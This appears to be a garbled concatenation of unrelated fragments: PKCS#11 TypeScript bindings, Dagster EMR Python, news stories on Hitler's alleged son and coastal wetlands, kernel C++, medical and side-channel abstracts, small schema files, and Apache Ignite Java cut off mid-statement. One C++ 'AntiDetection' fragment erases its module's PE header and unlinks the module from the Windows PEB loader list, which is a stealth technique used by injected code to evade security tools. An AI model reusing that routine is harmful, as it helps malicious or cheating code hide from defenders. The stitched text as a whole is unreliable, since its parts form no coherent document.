Object, mechanism: Mechanism, wrapped: Object, cancellable?: Gio.Cancellable | null ): Uint8Array; static from_handle(slot: Slot, session_handle: number, options: SessionOptions): Session; static open( slot: Slot, options: SessionOptions, interaction?: Gio.TlsInteraction | null, cancellable?: Gio.Cancellable | null ): Session; static open_async( slot: Slot, options: SessionOptions, interaction?: Gio.TlsInteraction | null, cancellable?: Gio.Cancellable | null ): Promise<Session>; static open_async( slot: Slot, options: SessionOptions, interaction: Gio.TlsInteraction | null, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<Session> | null ): void; static open_async( slot: Slot, options: SessionOptions, interaction?: Gio.TlsInteraction | null, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<Session> | null ): Promise<Session> | void; static open_finish(result: Gio.AsyncResult): Session; // Implemented Members init_async(io_priority: number, cancellable?: Gio.Cancellable | null): Promise<boolean>; init_async( io_priority: number, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; init_async( io_priority: number, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<boolean> | void; init_finish(res: Gio.AsyncResult): boolean; new_finish(res: Gio.AsyncResult): Session; vfunc_init_async(io_priority: number, cancellable?: Gio.Cancellable | null): Promise<boolean>; vfunc_init_async( io_priority: number, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; vfunc_init_async( io_priority: number, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<boolean> | void; vfunc_init_finish(res: Gio.AsyncResult): boolean; init(cancellable?: Gio.Cancellable | null): boolean; vfunc_init(cancellable?: Gio.Cancellable | null): boolean; } export module Slot { export interface ConstructorProperties extends GObject.Object.ConstructorProperties { [key: string]: any; handle: number; module: Module; } } export class Slot extends GObject.Object { static $gtype: GObject.GType<Slot>; constructor(properties?: Partial<Slot.ConstructorProperties>, ...args: any[]); _init(properties?: Partial<Slot.ConstructorProperties>, ...args: any[]): void; // Properties handle: number; module: Module; // Members enumerate_objects(match: Attributes, options: SessionOptions): Enumerator; equal(slot2: Slot): boolean; get_handle(): number; get_info(): SlotInfo; get_mechanism_info(mech_type: number): MechanismInfo; get_mechanisms(): number[]; get_module(): Module; get_token_info(): TokenInfo; has_flags(flags: number): boolean; hash(): number; match(uri: UriData): boolean; open_session(options: SessionOptions, cancellable?: Gio.Cancellable | null): Session; open_session_async(options: SessionOptions, cancellable?: Gio.Cancellable | null): Promise<Session>; open_session_async( options: SessionOptions, cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; open_session_async( options: SessionOptions, cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<Session> | void; open_session_finish(result: Gio.AsyncResult): Session; static from_handle(module: Module, slot_id: number): Slot; } export class Attribute { static $gtype: GObject.GType<Attribute>; constructor(attr_type: number, value: number, length: number); constructor(copy: Attribute); // Fields type: number; value: Uint8Array; length: number; // Constructors static ["new"](attr_type: number, value: number, length: number): Attribute; static new_boolean(attr_type: number, value: boolean): Attribute; static new_date(attr_type: number, value: GLib.Date): Attribute; static new_empty(attr_type: number): Attribute; static new_invalid(attr_type: number): Attribute; static new_string(attr_type: number, value: string): Attribute; static new_ulong(attr_type: number, value: number): Attribute; // Members clear(): void; dump(): void; dup(): Attribute; equal(attr2: Attribute): boolean; free(): void; get_boolean(): boolean; get_data(): Uint8Array; get_date(value: GLib.Date): void; get_string(): string | null; get_ulong(): number; hash(): number; init_copy(src: Attribute): void; is_invalid(): boolean; } export class Attributes { static $gtype: GObject.GType<Attributes>; constructor(reserved: number); constructor(copy: Attributes); // Constructors static ["new"](reserved: number): Attributes; // Members at(index: number): Attribute; contains(match: Attribute): boolean; count(): number; dump(): void; find(attr_type: number): Attribute; find_boolean(attr_type: number): [boolean, boolean]; find_date(attr_type: number): [boolean, GLib.Date]; find_string(attr_type: number): [boolean, string]; find_ulong(attr_type: number): [boolean, number]; ref(): Attributes; ref_sink(): Attributes; to_string(): string; unref(): void; } export class Builder { static $gtype: GObject.GType<Builder>; constructor(flags: BuilderFlags); constructor(copy: Builder); // Fields x: number[]; // Constructors static ["new"](flags: BuilderFlags): Builder; // Members add_all(attrs: Attributes): void; add_attribute(attr: Attribute): void; add_boolean(attr_type: number, value: boolean): void; add_data(attr_type: number, value?: Uint8Array | null): void; add_date(attr_type: number, value: GLib.Date): void; add_empty(attr_type: number): void; add_invalid(attr_type: number): void; add_only(attrs: Attributes, only_types: number[]): void; add_string(attr_type: number, value?: string | null): void; add_ulong(attr_type: number, value: number): void; clear(): void; copy(): Builder; end(): Attributes; find(attr_type: number): Attribute; find_boolean(attr_type: number): [boolean, boolean]; find_date(attr_type: number): [boolean, GLib.Date]; find_string(attr_type: number): [boolean, string]; find_ulong(attr_type: number): [boolean, number]; init(): void; init_full(flags: BuilderFlags): void; ref(): Builder; set_all(attrs: Attributes): void; set_boolean(attr_type: number, value: boolean): void; set_data(attr_type: number, value?: Uint8Array | null): void; set_date(attr_type: number, value: GLib.Date): void; set_empty(attr_type: number): void; set_invalid(attr_type: number): void; set_string(attr_type: number, value: string): void; set_ulong(attr_type: number, value: number): void; steal(): Attributes; take_data(attr_type: number, value?: Uint8Array | null): void; static unref(builder?: any | null): void; } export class EnumeratorPrivate { static $gtype: GObject.GType<EnumeratorPrivate>; constructor(copy: EnumeratorPrivate); } export class Mechanism { static $gtype: GObject.GType<Mechanism>; constructor( properties?: Partial<{ type?: number; parameter?: any; n_parameter?: number; }> ); constructor(copy: Mechanism); // Fields type: number; parameter: any; n_parameter: number; } export class MechanismInfo { static $gtype: GObject.GType<MechanismInfo>; constructor( properties?: Partial<{ min_key_size?: number; max_key_size?: number; flags?: number; }> ); constructor(copy: MechanismInfo); // Fields min_key_size: number; max_key_size: number; flags: number; // Members copy(): MechanismInfo; free(): void; } export class ModuleInfo { static $gtype: GObject.GType<ModuleInfo>; constructor( properties?: Partial<{ pkcs11_version_major?: number; pkcs11_version_minor?: number; manufacturer_id?: string; flags?: number; library_description?: string; library_version_major?: number; library_version_minor?: number; }> ); constructor(copy: ModuleInfo); // Fields pkcs11_version_major: number; pkcs11_version_minor: number; manufacturer_id: string; flags: number; library_description: string; library_version_major: number; library_version_minor: number; // Members copy(): ModuleInfo; free(): void; } export class ModulePrivate { static $gtype: GObject.GType<ModulePrivate>; constructor(copy: ModulePrivate); } export class ObjectPrivate { static $gtype: GObject.GType<ObjectPrivate>; constructor(copy: ObjectPrivate); } export class PasswordPrivate { static $gtype: GObject.GType<PasswordPrivate>; constructor(copy: PasswordPrivate); } export class SessionInfo { static $gtype: GObject.GType<SessionInfo>; constructor( properties?: Partial<{ slot_id?: number; state?: number; flags?: number; device_error?: number; }> ); constructor(copy: SessionInfo); // Fields slot_id: number; state: number; flags: number; device_error: number; // Members copy(): SessionInfo; free(): void; } export class SessionPrivate { static $gtype: GObject.GType<SessionPrivate>; constructor(copy: SessionPrivate); } export class SlotInfo { static $gtype: GObject.GType<SlotInfo>; constructor( properties?: Partial<{ slot_description?: string; manufacturer_id?: string; flags?: number; hardware_version_major?: number; hardware_version_minor?: number; firmware_version_major?: number; firmware_version_minor?: number; }> ); constructor(copy: SlotInfo); // Fields slot_description: string; manufacturer_id: string; flags: number; hardware_version_major: number; hardware_version_minor: number; firmware_version_major: number; firmware_version_minor: number; // Members copy(): SlotInfo; free(): void; } export class SlotPrivate { static $gtype: GObject.GType<SlotPrivate>; constructor(copy: SlotPrivate); } export class TokenInfo { static $gtype: GObject.GType<TokenInfo>; constructor( properties?: Partial<{ label?: string; manufacturer_id?: string; model?: string; serial_number?: string; flags?: number; max_session_count?: number; session_count?: number; max_rw_session_count?: number; rw_session_count?: number; max_pin_len?: number; min_pin_len?: number; total_public_memory?: number; free_public_memory?: number; total_private_memory?: number; free_private_memory?: number; hardware_version_major?: number; hardware_version_minor?: number; firmware_version_major?: number; firmware_version_minor?: number; utc_time?: number; }> ); constructor(copy: TokenInfo); // Fields label: string; manufacturer_id: string; model: string; serial_number: string; flags: number; max_session_count: number; session_count: number; max_rw_session_count: number; rw_session_count: number; max_pin_len: number; min_pin_len: number; total_public_memory: number; free_public_memory: number; total_private_memory: number; free_private_memory: number; hardware_version_major: number; hardware_version_minor: number; firmware_version_major: number; firmware_version_minor: number; utc_time: number; // Members copy(): TokenInfo; free(): void; } export class UriData { static $gtype: GObject.GType<UriData>; constructor(); constructor(copy: UriData); // Fields any_unrecognized: boolean; module_info: ModuleInfo; token_info: TokenInfo; attributes: Attributes; dummy: any[]; // Constructors static ["new"](): UriData; // Members copy(): UriData; free(): void; } export interface ObjectCacheNamespace { $gtype: GObject.GType<ObjectCache>; prototype: ObjectCachePrototype; } export type ObjectCache = ObjectCachePrototype; export interface ObjectCachePrototype extends Object { // Properties attributes: Attributes; // Members fill(attrs: Attributes): void; set_attributes(attrs?: Attributes | null): void; update(attr_types: number[], cancellable?: Gio.Cancellable | null): boolean; update_async(attr_types: number[], cancellable?: Gio.Cancellable | null): Promise<boolean>; update_async( attr_types: number[], cancellable: Gio.Cancellable | null, callback: Gio.AsyncReadyCallback<this> | null ): void; update_async( attr_types: number[], cancellable?: Gio.Cancellable | null, callback?: Gio.AsyncReadyCallback<this> | null ): Promise<boolean> | void; update_finish(result: Gio.AsyncResult): boolean; vfunc_fill(attrs: Attributes): void; } export const ObjectCache: ObjectCacheNamespace;
def _get_execute_steps(self, context, solid_name): action_on_failure = self.config['action_on_failure'] staging_bucket = self.config['staging_bucket'] run_id = context.run_id local_root = os.path.dirname(os.path.abspath(self.config['pipeline_file'])) steps = [] requirements_file = self.config.get('requirements_file_path') if requirements_file and not os.path.exists(requirements_file): raise DagsterInvalidDefinitionError( 'The requirements.txt file that was specified does not exist' ) if not requirements_file: requirements_file = os.path.join(local_root, 'requirements.txt') if os.path.exists(requirements_file): with open(requirements_file, 'rb') as f: python_dependencies = six.ensure_str(f.read()).split('\n') steps.append(get_install_requirements_step(python_dependencies, action_on_failure)) conf = dict(flatten_dict(self.config.get('spark_conf'))) conf['spark.app.name'] = conf.get('spark.app.name', solid_name) check.invariant( conf.get('spark.master', 'yarn') == 'yarn', desc='spark.master is configured as %s; cannot set Spark master on EMR to anything ' 'other than "yarn"' % conf.get('spark.master'), ) steps.append( { 'Name': 'Execute Solid %s' % solid_name, 'ActionOnFailure': action_on_failure, 'HadoopJarStep': { 'Jar': 'command-runner.jar', 'Args': [ EMR_SPARK_HOME + 'bin/spark-submit', '--master', 'yarn', '--deploy-mode', conf.get('spark.submit.deployMode', 'client'), ] + format_for_cli(list(flatten_dict(conf))) + [ '--py-files', 's3://%s/%s/pyspark.zip' % (staging_bucket, run_id), 's3://%s/%s/main.py' % (staging_bucket, run_id), ], }, } ) return steps
(Image Credit: Getty Images) Until his death in 1985, Jean-Marie Loret believed that he was the only son of Adolf Hitler. There is now renewed attention to evidence from France and Germany that apparently lends some credence to his claim. Loret collected information from two studies; one conducted by the University of Heidelberg in 1981 and another conducted by a handwriting analyst that showed Loret's blood type and handwriting, respectively, were similar to the Nazi Germany dictator who died childless in 1945 at age 56. The evidence is inconclusive but Loret's story itself was riveting enough to warrant some investigation. The French newspaper Le Pointe published an account last week of Loret's story, as he told Parisian lawyer Francois Gibault in 1979. Le Pointe retells Gibault's reaction to Loret's claim: "Master, I am the son of Hitler! Tell me what I should do," Gibault told Le Pointe. According to Le Pointe, the "Paris lawyer, does not believe his ears. The man before him is rather large, speaks perfect French without an accent, and is not a crackpot. His inspiring story is no less true." Loret claimed that his mother, Lobojoie Charlotte, met Hitler in 1914, when he was a corporal in the German army and she was 16. She described Hitler as "attentive and friendly." She and Hitler would take walks in the countryside, although conversation often was complicated by their language barrier. Yet, despite their differences, after an inebriated night in June 1917, little Jean-Marie was born in March 1918, according to Loret. Neither Loret nor the rest of his mother's family knew of the circumstances of his birth until the early 1950s when she confessed to her son that Hitler was his father. She had given her only son up for adoption in 1930 but stayed in touch with him, according to Loret. After this realization, according to LePointe, Loret began his journey to find out if the story was true, researching with a near-manic determination. He enlisted geneticists, handwriting experts and historians. He wrote a book, "Your Father's Name Was Hitler," that details that journey. It will now be republished to include the new studies that Loret believed confirmed his claim.
#include "AntiDetection.h" #include <Windows.h> HMODULE GetSelfModuleHandle() { MEMORY_BASIC_INFORMATION mbi; return ((::VirtualQuery(GetSelfModuleHandle, &mbi, sizeof(mbi)) != 0) ? (HMODULE)mbi.AllocationBase : NULL); } void HideModule(void* pModule) { void* pPEB = nullptr; _asm { push eax mov eax, fs: [0x30] mov pPEB, eax pop eax } void* pLDR = *((void**)((unsigned char*)pPEB + 0xc)); void* pCurrent = *((void**)((unsigned char*)pLDR + 0x0c)); void* pNext = pCurrent; do { void* pNextPoint = *((void**)((unsigned char*)pNext)); void* pLastPoint = *((void**)((unsigned char*)pNext + 0x4)); void* nBaseAddress = *((void**)((unsigned char*)pNext + 0x18)); if (nBaseAddress == pModule) { *((void**)((unsigned char*)pLastPoint)) = pNextPoint; *((void**)((unsigned char*)pNextPoint + 0x4)) = pLastPoint; pCurrent = pNextPoint; } pNext = *((void**)pNext); } while (pCurrent != pNext); } AntiDetection::AntiDetection() { //clear up PE headers. HMODULE hModule = GetSelfModuleHandle(); DWORD dwMemPro; VirtualProtect((void*)hModule, 0x1000, PAGE_EXECUTE_READWRITE, &dwMemPro); memset((void*)hModule, 0, 0x1000); VirtualProtect((void*)hModule, 0x1000, dwMemPro, &dwMemPro); OutputDebugStringA("CleanUp PEheader Success."); HideModule(hModule); OutputDebugStringA("Cutup PEB link success."); }
import {JsonObject, JsonProperty} from 'json2typescript'; import {ApiLyric} from './apiLyric'; @JsonObject('Song') export class ApiSong { @JsonProperty('title', String) public title: string = null; @JsonProperty('url', String) public url: string = null; @JsonProperty('cover', String) public cover: string = null; @JsonProperty('lyrics', [ApiLyric]) public lyrics: ApiLyric[] = null; }
// // Copyright 1998-2012 <NAME> // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. // #include "AddressSpace.h" #include "cpu_asm.h" #include "KernelDebug.h" #include "stdio.h" #include "Team.h" #include "Thread.h" List Team::fTeamList; Team::Team(const char name[]) : Resource(OBJ_TEAM, name), fThreadList(0) { fAddressSpace = new AddressSpace; cpu_flags fl = DisableInterrupts(); fTeamList.AddToTail(this); RestoreInterrupts(fl); } Team::~Team() { cpu_flags fl = DisableInterrupts(); fTeamList.Remove(this); RestoreInterrupts(fl); delete fAddressSpace; } void Team::ThreadCreated(Thread *thread) { AcquireRef(); cpu_flags fl = DisableInterrupts(); thread->fTeamListNext = fThreadList; fThreadList = thread; thread->fTeamListPrev = &fThreadList; if (thread->fTeamListNext) thread->fTeamListNext->fTeamListPrev = &thread->fTeamListNext; RestoreInterrupts(fl); } void Team::ThreadTerminated(Thread *thread) { cpu_flags fl = DisableInterrupts(); *thread->fTeamListPrev = thread->fTeamListNext; if (thread->fTeamListNext) thread->fTeamListNext->fTeamListPrev = thread->fTeamListPrev; RestoreInterrupts(fl); ReleaseRef(); } void Team::DoForEach(void (*EachTeamFunc)(void*, Team*), void *cookie) { cpu_flags fl = DisableInterrupts(); Team *team = static_cast<Team*>(fTeamList.GetHead()); team->AcquireRef(); while (team) { RestoreInterrupts(fl); EachTeamFunc(cookie, team); DisableInterrupts(); Team *next = static_cast<Team*>(fTeamList.GetNext(team)); if (next) next->AcquireRef(); team->ReleaseRef(); team = next; } RestoreInterrupts(fl); } void Team::Bootstrap() { Team *init = new Team("kernel", AddressSpace::GetKernelAddressSpace()); Thread::GetRunningThread()->SetTeam(init); AddDebugCommand("ps", "list running threads", PrintThreads); AddDebugCommand("areas", "list user areas", PrintAreas); AddDebugCommand("handles", "list handles", PrintHandles); } Team::Team(const char name[], AddressSpace *addressSpace) : Resource(OBJ_TEAM, name), fAddressSpace(addressSpace), fThreadList(0) { fTeamList.AddToTail(this); } void Team::PrintThreads(int, const char*[]) { const char *kThreadStateName[] = {"Created", "Wait", "Ready", "Running", "Dead"}; int threadCount = 0; int teamCount = 0; for (const ListNode *node = fTeamList.GetHead(); node; node = fTeamList.GetNext(node)) { const Team *team = static_cast<const Team*>(node); teamCount++; printf("Team %s\n", team->GetName()); printf("Name State CPRI BPRI\n"); for (Thread *thread = team->fThreadList; thread; thread = thread->fTeamListNext) { threadCount++; printf("%20s %8s %4d %4d\n", thread->GetName(), kThreadStateName[thread->GetState()], thread->GetCurrentPriority(), thread->GetBasePriority()); } printf("\n"); } printf("%d Threads %d Teams\n", threadCount, teamCount); } // This is a little misplaced, but it is the easiest way to get to // the team list. void Team::PrintAreas(int, const char**) { for (const ListNode *node = fTeamList.GetHead(); node; node = fTeamList.GetNext(node)) { const Team *team = static_cast<const Team*>(node); printf("Team %s\n", team->GetName()); team->GetAddressSpace()->Print(); } } void Team::PrintHandles(int, const char**) { for (const ListNode *node = fTeamList.GetHead(); node; node = fTeamList.GetNext(node)) { const Team *team = static_cast<const Team*>(node); printf("Team %s\n", team->GetName()); team->GetHandleTable()->Print(); } }
Comparative Study of Various Approximations to the Covariance Matrix in Template Attacks Template attacks have been shown to be among the strongest attacks when it comes to side–channel attacks. An essential ingredient there is to calculate the inverse of a covariance matrix. In this paper we make a comparative study of the effectiveness of some 24 different variants of template attacks based on different approximations of this covariance matrix. As an example, we have chosen a recent smart card where the plain text, cipher text, as well as the key leak strongly. Some of the more commonly chosen approximations to the covariance matrix turn out to be not very effective, whilst others are.
<reponame>litezk/schnorr-musig #![allow(non_snake_case)] pub mod aggregated_pubkey; pub mod encoder; pub mod errors; pub mod hasher; pub mod jubjub; pub mod signer; #[cfg(test)] pub mod tests; pub mod verifier;
import * as mongoose from 'mongoose'; export const HabitacionSchema = new mongoose.Schema({ servicios: [String], precioHora: Number, imagen: String, tipoHabitacion: {type: String, enum: ['INDIVIDUAL', 'DOBLE', 'TRIPLE', 'SUITE']}, });
Article body copy In 2012, tropical cyclone Sandy made landfall in the United States’ northeastern coast, killing scores and causing extensive damage. The storm went on to become the second costliest cyclone in US history, after Hurricane Katrina. But as new research shows, it could have been much worse. Confirming their long-argued role as natural defenses, scientists calculated that coastal wetlands prevented as much as US $625-million in property damage during the storm. Overall, Sandy caused an estimated $50-billion in flood damages. Storm surge causes much of the damage during a tropical cyclone, but wetlands helped absorb some of the wave energy and rising water. To understand the potential storm damage without the cushion of wetlands, researchers turned to computer modeling. Scientists at the University of California, Santa Cruz (UCSC), the Nature Conservancy, the Wildlife Conservation Society, and other institutions used models commonly used by insurance and reinsurance companies. Risk-modeling companies like Risk Management Solutions—one of the partners on the project—use wetlands data in their models for clients, but hadn’t previously broken the role of wetlands out separately. The two-year-long project found census tracts with wetlands experienced an average 10 percent reduction in property losses. In Maryland, wetlands reduced property damages by an estimated 30 percent. Delaware saw a 10 percent reduction. New Jersey, among the areas hardest hit by the storm, also saw the highest absolute savings with wetlands preventing $425-million in property damages. Researchers found that properties upstream from wetlands benefited from reduced flood heights. And just being in proximity of a wetland helped reduce damage. In Ocean County, New Jersey, a city hit especially hard by Sandy, the researchers took the study one step further, creating a set of 2,000 simulated storms based on historical weather records from 1900 and 2011 to estimate annual savings attributable to wetlands. The models found a 20 percent reduction in average annual coastal property losses. Wetlands, however, sometimes failed. The researchers found that wetlands may block the flow of water, which increased flood levels and damage to properties. It’s a negative effect also associated with sea walls and other artificial defenses. A wetland fail, however, was typically caused when man-made modifications changed water flow patterns. Michael Beck, the Nature Conservancy’s lead marine scientist and an adjunct professor at UCSC, says the research offers a way to appraise the value of wetlands. “By doing this kind of modeling, wetland conservation and restoration could be considered in insurance premiums,” he says. In addition, communities should rethink their rebuilding efforts, Beck says. He points out that after Sandy, tens of billions of dollars were invested in infrastructure projects like sea walls and levees, while only tens of millions went into strengthening green infrastructure—natural defenses, such as planting dunes and restoring freshwater flow into wetlands. This shift to green infrastructure has started in some places, however incrementally. In New York City, where wetlands have been shrinking for decades, a small slice of the city’s $20-billion post-Sandy resiliency plan includes funding for restoring 0.28 square kilometers of degraded wetlands on Staten Island and other coastal restoration projects. “We think a much greater portion of our post-disaster relief should go into natural resilience,” Beck says.
non-Hodgkin's lymphoma and occupation in Sweden: a registry based analysis. Incidence of non-Hodgkin's lymphoma in different employment categories was evaluated from the Swedish Cancer-Environment Registry, which links cancer incidence during 1961 to 1979 with occupational information from the 1960 census. New associations were found for men employed in shoemaking and shoe repair, porcelain and earthenware industries, education, and other white collar occupations. Several findings supported associations found in other countries, including excesses among woodworkers, furniture makers, electric power plant workers, farmers, dairy workers, lorry drivers, and other land transport workers. Risks were not increased among chemists, chemical or rubber manufacturing workers, or petrochemical refinery workers. Caution must be used in drawing causal inferences from these linked registry data because information on exposure and duration of employment is not available. Nevertheless, this study has suggested new clues to possible occupational determinants of non-Hodgkin's lymphoma.
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.ignite.internal.processors.cache.distributed.dht.atomic; import java.util.ArrayList; import java.util.Collection; import java.util.Collections; import java.util.Map; import java.util.UUID; import javax.cache.expiry.ExpiryPolicy; import javax.cache.processor.EntryProcessor; import org.apache.ignite.IgniteCheckedException; import org.apache.ignite.cache.CacheWriteSynchronizationMode; import org.apache.ignite.cluster.ClusterNode; import org.apache.ignite.internal.IgniteInternalFuture; import org.apache.ignite.internal.cluster.ClusterTopologyCheckedException; import org.apache.ignite.internal.cluster.ClusterTopologyServerNotFoundException; import org.apache.ignite.internal.processors.affinity.AffinityTopologyVersion; import org.apache.ignite.internal.processors.cache.CacheEntryPredicate; import org.apache.ignite.internal.processors.cache.CachePartialUpdateCheckedException; import org.apache.ignite.internal.processors.cache.EntryProcessorResourceInjectorProxy; import org.apache.ignite.internal.processors.cache.GridCacheContext; import org.apache.ignite.internal.processors.cache.GridCacheOperation; import org.apache.ignite.internal.processors.cache.GridCacheReturn; import org.apache.ignite.internal.processors.cache.GridCacheTryPutFailedException; import org.apache.ignite.internal.processors.cache.KeyCacheObject; import org.apache.ignite.internal.processors.cache.distributed.dht.GridDhtTopologyFuture; import org.apache.ignite.internal.processors.cache.distributed.near.GridNearAtomicCache; import org.apache.ignite.internal.processors.cache.version.GridCacheVersion; import org.apache.ignite.internal.util.future.GridFinishedFuture; import org.apache.ignite.internal.util.future.GridFutureAdapter; import org.apache.ignite.internal.util.typedef.CI1; import org.apache.ignite.internal.util.typedef.F; import org.apache.ignite.internal.util.typedef.X; import org.apache.ignite.internal.util.typedef.internal.CU; import org.apache.ignite.internal.util.typedef.internal.S; import org.apache.ignite.lang.IgniteProductVersion; import org.jetbrains.annotations.Nullable; import static org.apache.ignite.cache.CacheAtomicWriteOrderMode.CLOCK; import static org.apache.ignite.internal.processors.cache.GridCacheOperation.TRANSFORM; /** * DHT atomic cache near update future. */ public class GridNearAtomicSingleUpdateFuture extends GridNearAtomicAbstractUpdateFuture { /** */ private static final IgniteProductVersion SINGLE_UPDATE_REQUEST = IgniteProductVersion.fromString("1.7.4"); /** Keys */ private Object key; /** Values. */ @SuppressWarnings({"FieldAccessedSynchronizedAndUnsynchronized"}) private Object val; /** Not null is operation is mapped to single node. */ private GridNearAtomicAbstractUpdateRequest req; /** * @param cctx Cache context. * @param cache Cache instance. * @param syncMode Write synchronization mode. * @param op Update operation. * @param key Keys to update. * @param val Values or transform closure. * @param invokeArgs Optional arguments for entry processor. * @param retval Return value require flag. * @param rawRetval {@code True} if should return {@code GridCacheReturn} as future result. * @param expiryPlc Expiry policy explicitly specified for cache operation. * @param filter Entry filter. * @param subjId Subject ID. * @param taskNameHash Task name hash code. * @param skipStore Skip store flag. * @param keepBinary Keep binary flag. * @param remapCnt Maximum number of retries. * @param waitTopFut If {@code false} does not wait for affinity change future. */ public GridNearAtomicSingleUpdateFuture( GridCacheContext cctx, GridDhtAtomicCache cache, CacheWriteSynchronizationMode syncMode, GridCacheOperation op, Object key, @Nullable Object val, @Nullable Object[] invokeArgs, final boolean retval, final boolean rawRetval, @Nullable ExpiryPolicy expiryPlc, final CacheEntryPredicate[] filter, UUID subjId, int taskNameHash, boolean skipStore, boolean keepBinary, int remapCnt, boolean waitTopFut ) { super(cctx, cache, syncMode, op, invokeArgs, retval, rawRetval, expiryPlc, filter, subjId, taskNameHash, skipStore, keepBinary, remapCnt, waitTopFut); assert subjId != null; this.key = key; this.val = val; } /** {@inheritDoc} */ @Override public GridCacheVersion version() { synchronized (mux) { return futVer; } } /** {@inheritDoc} */ @Override public boolean onNodeLeft(UUID nodeId) { GridNearAtomicUpdateResponse res = null; GridNearAtomicAbstractUpdateRequest req; synchronized (mux) { req = this.req != null && this.req.nodeId().equals(nodeId) ? this.req : null; if (req != null && req.response() == null) { res = new GridNearAtomicUpdateResponse(cctx.cacheId(), nodeId, req.futureVersion(), cctx.deploymentEnabled()); ClusterTopologyCheckedException e = new ClusterTopologyCheckedException("Primary node left grid " + "before response is received: " + nodeId); e.retryReadyFuture(cctx.shared().nextAffinityReadyFuture(req.topologyVersion())); res.addFailedKeys(req.keys(), e); } } if (res != null) { if (msgLog.isDebugEnabled()) { msgLog.debug("Near update single fut, node left [futId=" + req.futureVersion() + ", writeVer=" + req.updateVersion() + ", node=" + nodeId + ']'); } onResult(nodeId, res, true); } return false; } /** {@inheritDoc} */ @Override public IgniteInternalFuture<Void> completeFuture(AffinityTopologyVersion topVer) { return null; } /** {@inheritDoc} */ @SuppressWarnings("ConstantConditions") @Override public boolean onDone(@Nullable Object res, @Nullable Throwable err) { assert res == null || res instanceof GridCacheReturn; GridCacheReturn ret = (GridCacheReturn)res; Object retval = res == null ? null : rawRetval ? ret : (this.retval || op == TRANSFORM) ? cctx.unwrapBinaryIfNeeded(ret.value(), keepBinary) : ret.success(); if (op == TRANSFORM && retval == null) retval = Collections.emptyMap(); if (super.onDone(retval, err)) { GridCacheVersion futVer = onFutureDone(); if (futVer != null) cctx.mvcc().removeAtomicFuture(futVer); return true; } return false; } /** {@inheritDoc} */ @SuppressWarnings({"unchecked", "ThrowableResultOfMethodCallIgnored"}) @Override public void onResult(UUID nodeId, GridNearAtomicUpdateResponse res, boolean nodeErr) { GridNearAtomicAbstractUpdateRequest req; AffinityTopologyVersion remapTopVer = null; GridCacheReturn opRes0 = null; CachePartialUpdateCheckedException err0 = null; GridFutureAdapter<?> fut0 = null; synchronized (mux) { if (!res.futureVersion().equals(futVer)) return; if (!this.req.nodeId().equals(nodeId)) return; req = this.req; this.req = null; boolean remapKey = !F.isEmpty(res.remapKeys()); if (remapKey) { if (mapErrTopVer == null || mapErrTopVer.compareTo(req.topologyVersion()) < 0) mapErrTopVer = req.topologyVersion(); } else if (res.error() != null) { if (res.failedKeys() != null) { if (err == null) err = new CachePartialUpdateCheckedException( "Failed to update keys (retry update if possible)."); Collection<Object> keys = new ArrayList<>(res.failedKeys().size()); for (KeyCacheObject key : res.failedKeys()) keys.add(cctx.cacheObjectContext().unwrapBinaryIfNeeded(key, keepBinary, false)); err.add(keys, res.error(), req.topologyVersion()); } } else { if (!req.fastMap() || req.hasPrimary()) { GridCacheReturn ret = res.returnValue(); if (op == TRANSFORM) { if (ret != null) { assert ret.value() == null || ret.value() instanceof Map : ret.value(); if (ret.value() != null) { if (opRes != null) opRes.mergeEntryProcessResults(ret); else opRes = ret; } } } else opRes = ret; } } if (remapKey) { assert mapErrTopVer != null; remapTopVer = cctx.shared().exchange().topologyVersion(); } else { if (err != null && X.hasCause(err, CachePartialUpdateCheckedException.class) && X.hasCause(err, ClusterTopologyCheckedException.class) && storeFuture() && --remapCnt > 0) { ClusterTopologyCheckedException topErr = X.cause(err, ClusterTopologyCheckedException.class); if (!(topErr instanceof ClusterTopologyServerNotFoundException)) { CachePartialUpdateCheckedException cause = X.cause(err, CachePartialUpdateCheckedException.class); assert cause != null && cause.topologyVersion() != null : err; remapTopVer = new AffinityTopologyVersion(cause.topologyVersion().topologyVersion() + 1); err = null; updVer = null; } } } if (remapTopVer == null) { err0 = err; opRes0 = opRes; } else { fut0 = topCompleteFut; topCompleteFut = null; cctx.mvcc().removeAtomicFuture(futVer); futVer = null; topVer = AffinityTopologyVersion.ZERO; } } if (res.error() != null && res.failedKeys() == null) { onDone(res.error()); return; } if (nearEnabled && !nodeErr) updateNear(req, res); if (remapTopVer != null) { if (fut0 != null) fut0.onDone(); if (!waitTopFut) { onDone(new GridCacheTryPutFailedException()); return; } if (topLocked) { CachePartialUpdateCheckedException e = new CachePartialUpdateCheckedException("Failed to update keys (retry update if possible)."); ClusterTopologyCheckedException cause = new ClusterTopologyCheckedException( "Failed to update keys, topology changed while execute atomic update inside transaction."); cause.retryReadyFuture(cctx.affinity().affinityReadyFuture(remapTopVer)); e.add(Collections.singleton(cctx.toCacheKeyObject(key)), cause); onDone(e); return; } IgniteInternalFuture<AffinityTopologyVersion> fut = cctx.shared().exchange().affinityReadyFuture(remapTopVer); if (fut == null) fut = new GridFinishedFuture<>(remapTopVer); fut.listen(new CI1<IgniteInternalFuture<AffinityTopologyVersion>>() 